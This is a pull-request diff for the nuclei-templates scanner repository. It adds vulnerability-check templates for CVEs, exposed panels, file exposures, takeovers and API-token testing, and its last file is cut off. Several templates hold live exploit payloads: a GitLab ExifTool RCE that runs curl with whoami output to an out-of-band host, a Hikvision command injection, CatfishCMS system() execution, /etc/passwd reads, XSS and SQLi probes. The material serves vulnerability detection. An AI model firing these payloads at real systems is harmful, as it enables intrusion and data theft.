Merge pull request #105 from projectdiscovery/master

Updation
patch-1
Dhiyaneshwaran 2021-10-29 18:12:58 +05:30 committed by GitHub
commit 80484df046
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
86 changed files with 2120 additions and 962 deletions

View File

@ -11,23 +11,19 @@ jobs:
with: with:
go-version: 1.17 go-version: 1.17
#- name: Cache Go - name: Cache Go
# id: cache-go id: cache-go
# uses: actions/cache@v2 uses: actions/cache@v2
# with: with:
# path: /home/runner/go path: /home/runner/go
# key: ${{ runner.os }}-go key: ${{ runner.os }}-go
- name: Installing Nuclei - name: Installing Nuclei
# if: steps.cache-go.outputs.cache-hit != 'true' if: steps.cache-go.outputs.cache-hit != 'true'
env:
GO111MODULE: on
run: | run: |
go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@dev go install github.com/projectdiscovery/nuclei/v2/cmd/nuclei@latest
shell: bash
- name: Template Validation - name: Template Validation
run: | run: |
nuclei -validate -t . nuclei -validate -t .
nuclei -validate -w ./workflows nuclei -validate -w ./workflows
shell: bash

View File

@ -1,13 +1,11 @@
name: 🗒 Templates Stats name: 🗒 Templates Stats
on: on:
create:
workflow_dispatch: workflow_dispatch:
jobs: jobs:
build: build:
runs-on: ubuntu-latest runs-on: ubuntu-latest
if: ${{ startsWith(github.ref, 'refs/tags/v') }}
steps: steps:
- uses: actions/checkout@master - uses: actions/checkout@master
- uses: actions/setup-go@v2 - uses: actions/setup-go@v2

View File

@ -42,18 +42,18 @@ An overview of the nuclei template project, including statistics on unique tags,
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | | cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | | lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | | panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | | xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | | wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | | exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | | rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | | tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | | | cve2020 | 166 | madrobot | 63 | file | 51 | | | | |
**176 directories, 2418 files**. **178 directories, 2459 files**.
</td> </td>
</tr> </tr>

File diff suppressed because one or more lines are too long

File diff suppressed because it is too large Load Diff

View File

@ -1,12 +1,12 @@
| TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT | | TAG | COUNT | AUTHOR | COUNT | DIRECTORY | COUNT | SEVERITY | COUNT | TYPE | COUNT |
|-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------| |-----------|-------|---------------|-------|------------------|-------|----------|-------|---------|-------|
| cve | 838 | dhiyaneshdk | 296 | cves | 842 | info | 775 | http | 2244 | | cve | 843 | dhiyaneshdk | 300 | cves | 847 | info | 806 | http | 2286 |
| lfi | 344 | daffainfo | 289 | vulnerabilities | 329 | high | 651 | file | 50 | | lfi | 348 | daffainfo | 290 | vulnerabilities | 332 | high | 655 | file | 51 |
| panel | 284 | pikpikcu | 281 | exposed-panels | 278 | medium | 478 | network | 46 | | panel | 292 | pikpikcu | 281 | exposed-panels | 286 | medium | 483 | network | 46 |
| xss | 259 | pdteam | 201 | technologies | 202 | critical | 297 | dns | 12 | | xss | 260 | pdteam | 202 | technologies | 203 | critical | 299 | dns | 12 |
| wordpress | 255 | geeknik | 166 | exposures | 196 | low | 156 | | | | wordpress | 260 | geeknik | 166 | exposures | 199 | low | 157 | | |
| exposure | 245 | dwisiswant0 | 131 | misconfiguration | 143 | | | | | | exposure | 248 | dwisiswant0 | 152 | misconfiguration | 143 | | | | |
| rce | 215 | gy741 | 83 | takeovers | 65 | | | | | | rce | 218 | gy741 | 83 | token-spray | 83 | | | | |
| tech | 196 | pussycat0x | 74 | token-spray | 63 | | | | | | tech | 197 | pussycat0x | 76 | takeovers | 66 | | | | |
| wp-plugin | 178 | princechaddha | 66 | default-logins | 60 | | | | | | wp-plugin | 180 | princechaddha | 67 | default-logins | 60 | | | | |
| cve2020 | 166 | madrobot | 63 | file | 50 | | | | | | cve2020 | 166 | madrobot | 63 | file | 51 | | | | |

27
cnvd/CNVD-2019-06255.yaml Normal file
View File

@ -0,0 +1,27 @@
id: CNVD-2019-06255
info:
name: CatfishCMS RCE
author: Lark-Lab
severity: medium
reference: http://112.124.31.29/%E6%BC%8F%E6%B4%9E%E5%BA%93/01-CMS%E6%BC%8F%E6%B4%9E/CatfishCMS/CNVD-2019-06255%20CatfishCMS%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C/
tags: rce,cvnd,catfishcms
requests:
- method: GET
path:
- "{{BaseURL}}/s=set&_method=__construct&method=*&filter[]=system"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
condition: and
words:
- 'OS'
- 'PATH'
- 'SHELL'
- 'USER'

View File

@ -0,0 +1,32 @@
id: CVE-2015-5471
info:
name: Swim Team <= v1.44.10777 - Local File Inclusion
author: 0x_Akoko
severity: medium
description: The code in ./wp-swimteam/include/user/download.php doesnt sanitize user input from downloading sensitive system files.
reference:
- https://wpscan.com/vulnerability/b00d9dda-721d-4204-8995-093f695c3568
- http://www.vapid.dhs.org/advisory.php?v=134
- https://nvd.nist.gov/vuln/detail/CVE-2015-5471
tags: cve,cve2015,wordpress,wp-plugin,lfi
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30
cve-id: CVE-2015-5471
cwe-id: CWE-22
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/wp-swimteam/include/user/download.php?file=/etc/passwd&filename=/etc/passwd&contenttype=text/html&transient=1&abspath=/usr/share/wordpress"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:[x*]:0:0"
- type: status
status:
- 200

View File

@ -0,0 +1,37 @@
id: CVE-2016-1000136
info:
name: heat-trackr v1.0 - XSS via heat-trackr_abtest_add.php
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin heat-trackr v1.0
reference:
- http://www.vapidlabs.com/wp/wp_advisory.php?v=798
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000136
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000136
cwe-id: CWE-79
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/heat-trackr/heat-trackr_abtest_add.php?id=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"
matchers-condition: and
matchers:
- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body
- type: word
part: header
words:
- text/html
- type: status
status:
- 200

View File

@ -0,0 +1,32 @@
id: CVE-2017-0929
info:
name: DotNetNuke ImageHandler SSRF
author: charanrayudu,meme-lord
severity: high
description: DNN (aka DotNetNuke) before 9.2.0 suffers from a Server-Side Request Forgery (SSRF) vulnerability in the DnnImageHandler class. Attackers may be able to access information about internal network resources.
reference:
- https://hackerone.com/reports/482634
- https://nvd.nist.gov/vuln/detail/CVE-2017-0929
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2017-0929
cwe-id: CWE-918
tags: cve,cve2017,oast,ssrf,dnn
requests:
- method: GET
path:
- '{{BaseURL}}/DnnImageHandler.ashx?mode=file&url=http://{{interactsh-url}}'
matchers-condition: and
matchers:
- type: word
part: interactsh_protocol
words:
- "http"
- type: status
status:
- 500

View File

@ -4,6 +4,7 @@ info:
name: Etherpad Lite before 1.6.4 is exploitable for admin access. name: Etherpad Lite before 1.6.4 is exploitable for admin access.
author: philippedelteil author: philippedelteil
severity: critical severity: critical
description: Etherpad Lite before 1.6.4 is exploitable for admin access.
reference: reference:
- https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4 - https://infosecwriteups.com/account-takeovers-believe-the-unbelievable-bb98a0c251a4
- https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b - https://github.com/ether/etherpad-lite/commit/ffe24c3dd93efc73e0cbf924db9a0cc40be9511b

View File

@ -6,7 +6,7 @@ info:
severity: medium severity: medium
description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1. description: An email address enumeration vulnerability exists in the password reset function of Rocket.Chat through 3.9.1.
reference: https://trovent.io/security-advisory-2010-01 reference: https://trovent.io/security-advisory-2010-01
tags: cve,cve2020,rockethchat tags: cve,cve2020,rocketchat
classification: classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.30 cvss-score: 5.30

View File

@ -0,0 +1,63 @@
id: CVE-2021-22205
info:
name: GitLab CE/EE Unauthenticated RCE using ExifTool
author: pdteam
severity: critical
description: An issue has been discovered in GitLab CE/EE affecting all versions starting from 11.9. GitLab was not properly validating image files that were passed to a file parser which resulted in a remote command execution.
reference:
- https://security.humanativaspa.it/gitlab-ce-cve-2021-22205-in-the-wild/
- https://hackerone.com/reports/1154542
- https://nvd.nist.gov/vuln/detail/CVE-2021-22205
tags: cve,cve2021,gitlab,rce,oast
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
cvss-score: 9.90
cve-id: CVE-2021-22205
cwe-id: CWE-20
requests:
- raw:
- |
GET /users/sign_in HTTP/1.1
Host: {{Hostname}}
Origin: {{BaseURL}}
- |
POST /uploads/user HTTP/1.1
Host: {{Hostname}}
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryIMv3mxRg59TkFSX5
X-CSRF-Token: {{csrf-token}}
{{hex_decode('0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358350D0A436F6E74656E742D446973706F736974696F6E3A20666F726D2D646174613B206E616D653D2266696C65223B2066696C656E616D653D22746573742E6A7067220D0A436F6E74656E742D547970653A20696D6167652F6A7065670D0A0D0A41542654464F524D000003AF444A564D4449524D0000002E81000200000046000000ACFFFFDEBF992021C8914EEB0C071FD2DA88E86BE6440F2C7102EE49D36E95BDA2C3223F464F524D0000005E444A5655494E464F0000000A00080008180064001600494E434C0000000F7368617265645F616E6E6F2E696666004247343400000011004A0102000800088AE6E1B137D97F2A89004247343400000004010FF99F4247343400000002020A464F524D00000307444A5649414E546100000150286D657461646174610A0928436F7079726967687420225C0A22202E2071787B')}}curl `whoami`.{{interactsh-url}}{{hex_decode('7D202E205C0A2220622022292029202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A0D0A2D2D2D2D2D2D5765624B6974466F726D426F756E64617279494D76336D7852673539546B465358352D2D0D0A')}}
cookie-reuse: true
matchers-condition: and
matchers:
- type: word
words:
- 'Failed to process image'
- type: word
part: interactsh_protocol # Confirms the DNS Interaction
words:
- "dns"
- type: status
status:
- 422
extractors:
- type: regex
name: csrf-token
internal: true
group: 1
regex:
- 'csrf-token" content="(.*?)" />\n\n<meta'
- type: regex
name: whoami
part: interactsh_request
group: 1
regex:
- '([a-z0-9]+)\.([a-z0-9]+)\.interactsh\.com'

View File

@ -0,0 +1,49 @@
id: CVE-2021-36260
info:
name: Hikvision IP camera/NVR - Unauthenticated RCE
author: pdteam,gy741
severity: critical
description: A command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.
reference:
- https://watchfulip.github.io/2021/09/18/Hikvision-IP-Camera-Unauthenticated-RCE.html
- https://www.hikvision.com/en/support/cybersecurity/security-advisory/security-notification-command-injection-vulnerability-in-some-hikvision-products/
- https://nvd.nist.gov/vuln/detail/CVE-2021-36260
- https://github.com/Aiminsun/CVE-2021-36260
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2021-36260
cwe-id: CWE-77,CWE-20
metadata:
shodan-query: http.favicon.hash:999357577
tags: cve,cve2021,hikvision,rce,iot,intrusive
requests:
- raw:
- |
PUT /SDK/webLanguage HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
<?xml version="1.0" encoding="UTF-8"?><language>$(id>webLib/x)</language>
- |
GET /x HTTP/1.1
Host: {{Hostname}}
req-condition: true
matchers-condition: and
matchers:
- type: dsl
dsl:
- "contains(body_2,'uid=') && contains(body_2,'gid=')"
- type: status
status:
- 200
extractors:
- type: regex
regex:
- "(u|g)id=.*"

View File

@ -0,0 +1,35 @@
id: CVE-2021-36749
info:
name: Apache Druid Authentication Restrictions Bypass
author: _0xf4n9x_
severity: medium
description: In the Druid ingestion system, the InputSource is used for reading data from a certain data source. However, the HTTP InputSource allows authenticated users to read data from other sources than intended, such as the local file system, with the privileges of the Druid server process. This is not an elevation of privilege when users access Druid directly, since Druid also provides the Local InputSource, which allows the same level of access. But it is problematic when users interact with Druid indirectly through an application that allows users to specify the HTTP InputSource, but not the Local InputSource. In this case, users could bypass the application-level restriction by passing a file URL to the HTTP InputSource. This issue was previously mentioned as being fixed in 0.21.0 as per CVE-2021-26920 but was not fixed in 0.21.0 or 0.21.1.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-36749
- https://www.cvedetails.com/cve/CVE-2021-36749/
- https://github.com/BrucessKING/CVE-2021-36749
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 6.5
cve-id: CVE-2021-36749
cwe-id: CWE-668
tags: cve,cve2021,apache,lfi,auth-bypass
requests:
- raw:
- |
POST /druid/indexer/v1/sampler?for=connect HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
{"type":"index","spec":{"type":"index","ioConfig":{"type":"index","firehose":{"type":"http","uris":[" file:///etc/passwd "]}},"dataSchema":{"dataSource":"sample","parser":{"type":"string", "parseSpec":{"format":"regex","pattern":"(.*)","columns":["a"],"dimensionsSpec":{},"timestampSpec":{"column":"no_ such_ column","missingValue":"2010-01-01T00:00:00Z"}}}}},"samplerConfig":{"numRows":500,"timeoutMs":15000}}
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "druid:*:1000:1000:"
condition: or

View File

@ -0,0 +1,69 @@
id: CVE-2021-42258
info:
name: BillQuick Web Suite SQLi
author: dwisiswant0
severity: critical
tags: cve,cve2021,sqli,billquick
description: |
BQE BillQuick Web Suite 2018 through 2021 before 22.0.9.1
allows SQL injection for unauthenticated remote code execution,
as exploited in the wild in October 2021 for ransomware installation.
SQL injection can, for example, use the txtID (aka username) parameter.
Successful exploitation can include the ability to execute
arbitrary code as MSSQLSERVER$ via xp_cmdshell.
reference:
- https://www.huntress.com/blog/threat-advisory-hackers-are-exploiting-a-vulnerability-in-popular-billing-software-to-deploy-ransomware
- https://nvd.nist.gov/vuln/detail/CVE-2021-42258
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.80
cve-id: CVE-2021-42258
cwe-id: CWE-89
requests:
- raw:
- |
GET / HTTP/1.1
Host: {{Hostname}}
- |
POST / HTTP/1.1
Host: {{Hostname}}
Referer: {{BaseURL}}
Origin: {{RootURL}}
Content-Type: application/x-www-form-urlencoded
__EVENTTARGET=cmdOK&__EVENTARGUMENT=&__VIEWSTATE={{url_encode("§VS§")}}&__VIEWSTATEGENERATOR={{url_encode("§VSG§")}}&__EVENTVALIDATION={{url_encode("§EV§")}}&txtID=uname%27&txtPW=passwd&hdnClientDPI=96
cookie-reuse: true
extractors:
- type: xpath
name: VS
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATE']"
- type: xpath
name: VSG
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__VIEWSTATEGENERATOR']"
- type: xpath
name: EV
internal: true
attribute: value
xpath:
- "/html/body/form/div/input[@id='__EVENTVALIDATION']"
matchers:
- type: word
part: body
condition: and
words:
- "System.Data.SqlClient.SqlException"
- "Incorrect syntax near"
- "_ACCOUNTLOCKED"

View File

@ -0,0 +1,39 @@
id: CVE-2021-42565
info:
author: madrobot
name: myfactory FMS - Reflected XSS
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the UID parameter.
reference:
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-42565
cwe-id: CWE-79
tags: cve,cve2021,myfactory,xss
requests:
- method: GET
path:
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Denied&UID=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
condition: and
- type: word
part: header
words:
- "text/html"

View File

@ -0,0 +1,39 @@
id: CVE-2021-42566
info:
name: myfactory FMS - Reflected XSS
author: madrobot
severity: medium
description: myfactory.FMS before 7.1-912 allows XSS via the Error parameter.
reference:
- https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-001/-cross-site-scripting-in-myfactory-fms
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=2021-42566
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-42566
cwe-id: CWE-79
tags: cve,cve2021,myfactory,xss
requests:
- method: GET
path:
- '{{BaseURL}}/ie50/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
- '{{BaseURL}}/system/login/SysLoginUser.aspx?Login=Error&Error=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "</script><script>alert(document.domain)</script>"
condition: and
- type: word
part: header
words:
- "text/html"

View File

@ -11,7 +11,7 @@ dns:
type: CNAME type: CNAME
class: inet class: inet
recursion: true recursion: true
retries: 5 retries: 3
matchers-condition: or matchers-condition: or
matchers: matchers:
@ -29,3 +29,8 @@ dns:
name: announcekit name: announcekit
words: words:
- "cname.announcekit.app" - "cname.announcekit.app"
- type: word
name: wix
words:
- "wixdns.net"

View File

@ -0,0 +1,24 @@
id: openemr-detect
info:
name: OpenEMR Product Detect
author: pussycat0x
severity: info
metadata:
shodan-dork: 'app="OpenEMR"'
tags: panel,openemr
requests:
- method: GET
path:
- "{{BaseURL}}/interface/login/login.php?site=default"
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"title":"OpenEMR Product Registration"'
- type: status
status:
- 200

View File

@ -10,14 +10,18 @@ requests:
- method: GET - method: GET
path: path:
- "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi" - "{{BaseURL}}/dana-na/auth/url_default/welcome.cgi"
- "{{BaseURL}}/dana-na/auth/url_2/welcome.cgi"
- "{{BaseURL}}/dana-na/auth/url_3/welcome.cgi"
stop-at-first-match: true
matchers-condition: or matchers-condition: or
matchers: matchers:
- type: word - type: word
part: header
words: words:
- "/dana-na/auth/welcome.cgi" - "/dana-na/auth/welcome.cgi"
part: header
- type: regex - type: regex
part: body
regex: regex:
- "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css" - "(?i)/dana-na/css/ds(_[a-f0-9]{64})?.css"
part: body

View File

@ -0,0 +1,22 @@
id: redis-commander-exposure
info:
name: Redis Commander Exposure
author: dahse89
severity: low
reference:
- https://joeferner.github.io/redis-commander/
- https://github.com/joeferner/redis-commander
tags: panel,redis
requests:
- method: GET
path:
- '{{BaseURL}}'
matchers:
- type: word
condition: and
words:
- "<title>Redis Commander"
- "redisCommanderBearerToken"

View File

@ -0,0 +1,24 @@
id: securityspy-detect
info:
name: SecuritySpy Camera Detect
author: pussycat0x
severity: medium
metadata:
shodan-dork: 'title:SecuritySpy'
tags: unauth,iot,securityspy,panel,camera
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
words:
- '<title>SecuritySpy</title>'
part: body
- type: status
status:
- 200

View File

@ -0,0 +1,26 @@
id: sugarcrm-panel
info:
name: Detect SugarCRM Panel
author: johnk3r
severity: info
reference: https://www.shodan.io/search?query=sugarcrm
tags: sugarcrm,panel
requests:
- method: GET
path:
- "{{BaseURL}}"
- "{{BaseURL}}/index.php?action=Login&module=Users"
stop-at-first-match: true
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>SugarCRM</title>"
- type: status
status:
- 200

View File

@ -0,0 +1,31 @@
id: dwsync-exposure
info:
name: Dwsync.xml Exposure
author: KaizenSecurity
severity: info
description: The dwsync.xml file is a file generated by Dreamweaver. Where the file contains information related to what files are in the website directory.
tags: dwsync,exposure,dreamweaver
requests:
- method: GET
path:
- "{{BaseURL}}/_notes/dwsync.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: header
words:
- application/xml
- type: word
part: body
words:
- '<dwsync>'
- '</dwsync>'
condition: and

View File

@ -0,0 +1,27 @@
id: idea-folder-exposure
info:
name: Public .idea Folder containing files with sensitive data
author: martincodes-de
severity: info
description: Searches for .idea Folder by querying the /.idea and a few other files with sensitive data.
tags: phpstorm,jetbrains,idea,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.idea/deployment.xml"
- "{{BaseURL}}/.idea/workspace.xml"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<?xml version="
- "<project version"
part: body
condition: and

View File

@ -0,0 +1,26 @@
id: idea-logs-exposure
info:
name: Public .idea Folder containing http logs
author: martincodes-de
severity: info
description: Searches for .idea Folder for http-requests-log.http and http-client.cookies file
tags: phpstorm,jetbrains,idea,exposure
requests:
- method: GET
path:
- "{{BaseURL}}/.idea/httpRequests/http-requests-log.http"
- "{{BaseURL}}/.idea/httpRequests/http-client.cookies"
matchers-condition: or
matchers:
- type: regex
regex:
- '(?m)^(GET|POST) https?:\/\/'
part: body
- type: word
words:
- "# domain path name value date"
part: body

View File

@ -0,0 +1,50 @@
id: python-scanner
info:
name: Python Scanner
author: majidmc2
severity: info
description: Indicators for dangerous Python functions
reference:
- https://www.kevinlondon.com/2015/07/26/dangerous-python-functions.html
- https://www.kevinlondon.com/2015/08/15/dangerous-python-functions-pt2.html
tags: python,file,sast
file:
- extensions:
- py
extractors:
- type: regex
name: code-injection
regex:
- 'exec'
- 'eval'
- '__import__'
- type: regex
name: command-injection
regex:
- 'subprocess.call\(.*shell=True.*\)'
- 'os.system'
- 'os.popen'
- type: regex
name: untrusted-source
regex:
- 'pickle.loads'
- 'cPickle.loads'
- type: regex
name: dangerous-yaml
regex:
- 'yaml.load'
- type: regex
name: sqli
regex:
- 'cursor.execute'

View File

@ -5,6 +5,7 @@ info:
author: Cristi vlad (@cristivlad25) author: Cristi vlad (@cristivlad25)
severity: info severity: info
description: Finds Application YAML files which often contain sensitive information. description: Finds Application YAML files which often contain sensitive information.
tags: misconfig
requests: requests:
- method: GET - method: GET

View File

@ -0,0 +1,25 @@
id: wix-takeover
info:
author: harshinsecurity,philippedelteil
description: This subdomain take over would only work on an edge case when the account was deleted. You will need a premium account (~ US$7) to test the take over.
severity: high
tags: takeover,wix
reference: https://github.com/EdOverflow/can-i-take-over-xyz/issues/231
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
condition: or
words:
- 'Error ConnectYourDomain occurred'
- 'wixErrorPagesApp'
- type: status
status:
- 404

View File

@ -0,0 +1,22 @@
id: aws-cloudfront-service
info:
name: AWS Cloudfront service detection
author: jiheon-dev
severity: info
tags: aws,tech
description: Detect websites using AWS cloudfront service
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers:
- type: dsl
condition: or
dsl:
- "contains(tolower(all_headers), 'x-cache: hit from cloudfront')"
- "contains(tolower(all_headers), 'x-cache: refreshhit from cloudfront')"
- "contains(tolower(all_headers), 'x-cache: miss from cloudfront')"
- "contains(tolower(all_headers), 'x-cache: error from cloudfront')"

View File

@ -0,0 +1,25 @@
id: hikvision-detection
info:
name: Hikvision Detection
author: pdteam
severity: info
tags: tech,hikvision
requests:
- method: GET
path:
- "{{BaseURL}}/favicon.ico"
- "{{BaseURL}}/doc/page/login.asp"
stop-at-first-match: true
matchers-condition: or
matchers:
- type: word
words:
- "Hikvision Digital Technology"
- type: dsl
name: favicon
dsl:
- "status_code==200 && ('999357577' == mmh3(base64_py(body)))"

View File

@ -0,0 +1,24 @@
id: ibm-sterling-detect
info:
name: IBM Sterling File Gateway Detect
author: princechaddha
severity: info
tags: tech,sterling,ibm
requests:
- method: GET
path:
- "{{BaseURL}}"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "<title>Welcome to IBM Sterling File Gateway"
- type: status
status:
- 200

View File

@ -0,0 +1,23 @@
id: api-adafruit-io
info:
name: Adafruit IO API Test
author: dwisiswant0
severity: info
reference: https://io.adafruit.com/api/docs/
tags: token-spray,adafruit
self-contained: true
requests:
- method: GET
path:
- "https://io.adafruit.com/api/v2/user"
headers:
X-AIO-Key: "{{token}}"
matchers:
- type: word
part: body
words:
- "error"
negative: true

View File

@ -0,0 +1,24 @@
id: api-appveyor
info:
name: AppVeyor API Test
author: dwisiswant0
severity: info
reference: https://www.appveyor.com/docs/api/
tags: token-spray,appveyor
self-contained: true
requests:
- method: GET
path:
- "https://ci.appveyor.com/api/roles"
headers:
Content-Type: application/json
Authorization: Bearer {{token}}
matchers:
- type: word
part: body
words:
- "Authorization required"
negative: true

View File

@ -0,0 +1,25 @@
id: api-binance
info:
name: Binance REST API
author: geeknik
severity: info
reference: https://github.com/binance/binance-spot-api-docs/blob/master/rest-api.md
tags: token-spray,binance
self-contained: true
requests:
- method: GET
path:
- "https://api.binance.com/api/v3/historicalTrades"
headers:
X-MBX-APIKEY: "{{token}}"
matchers:
- type: word
part: body
words:
- "Invalid API-key"
- "key format invalid"
condition: or
negative: true

View File

@ -0,0 +1,19 @@
id: api-cooperhewitt
info:
name: Cooper Hewitt API
author: daffainfo
severity: info
reference: https://collection.cooperhewitt.org/api/methods/
tags: token-spray,cooperhewitt
self-contained: true
requests:
- method: GET
path:
- "https://api.collection.cooperhewitt.org/rest/?method=api.spec.formats&access_token={{token}}"
matchers:
- type: status
status:
- 200

26
token-spray/api-dbt.yaml Normal file
View File

@ -0,0 +1,26 @@
id: api-dbt
info:
name: dbt Cloud API Test
author: dwisiswant0
severity: info
reference: https://docs.getdbt.com/docs/introduction
tags: token-spray,dbt
self-contained: true
requests:
- method: GET
path:
- "https://cloud.getdbt.com/api/v2/accounts/"
headers:
Content-Type: application/json
Authorization: Token {{token}}
matchers:
- type: word
part: body
words:
- "Invalid token"
- "Authentication credentials were not provided."
condition: or
negative: true

View File

@ -0,0 +1,25 @@
id: api-leanix
info:
name: LeanIX API Test
author: dwisiswant0
severity: info
reference: https://docs.leanix.net/docs/rest-api
tags: token-spray,leanix
self-contained: true
requests:
- method: GET
path:
- "https://us.leanix.net/services/integration-api/v1/examples/starterExample"
- "https://eu.leanix.net/services/integration-api/v1/examples/starterExample"
headers:
Authorization: Bearer {{token}}
stop-at-first-match: true
matchers:
- type: word
part: body
words:
- "Credentials are required"
negative: true

View File

@ -0,0 +1,23 @@
id: api-strava
info:
